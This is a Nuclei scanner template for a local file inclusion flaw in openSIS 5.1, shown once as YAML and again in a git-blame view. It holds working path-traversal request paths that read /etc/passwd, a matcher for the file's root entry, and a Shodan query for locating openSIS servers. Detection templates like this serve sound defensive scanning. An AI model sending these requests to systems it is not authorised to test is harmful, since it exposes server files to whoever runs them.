nuclei-templates/vulnerabilities/other/opensis-lfi.yaml

id: opensis-lfi

info:
  name: openSIS 5.1 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
  reference:
    - https://www.exploit-db.com/exploits/38039
  metadata:
    shodan-query: http.title:"openSIS"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: opensis,lfi,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
      - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
Create opensis-lfi.yaml 2021-07-27 00:43:02 +00:00			`id: opensis-lfi`

			`info:`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`name: openSIS 5.1 - Local File Inclusion`
Create opensis-lfi.yaml 2021-07-27 00:43:02 +00:00			`author: pikpikcu`
			`severity: high`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:12 +00:00			`reference:`
Create opensis-lfi.yaml 2021-07-27 00:43:02 +00:00			`- https://www.exploit-db.com/exploits/38039`
Update opensis-lfi.yaml 2022-07-10 09:37:18 +00:00			`metadata:`
			`shodan-query: http.title:"openSIS"`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: opensis,lfi,edb`
Create opensis-lfi.yaml 2021-07-27 00:43:02 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update opensis-lfi.yaml 2021-07-27 01:07:21 +00:00			`- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"`
			`- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"`
Create opensis-lfi.yaml 2021-07-27 00:43:02 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
Update opensis-lfi.yaml 2021-07-27 01:07:21 +00:00			`- 200`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00
			`# Enhanced by mp on 2022/08/04`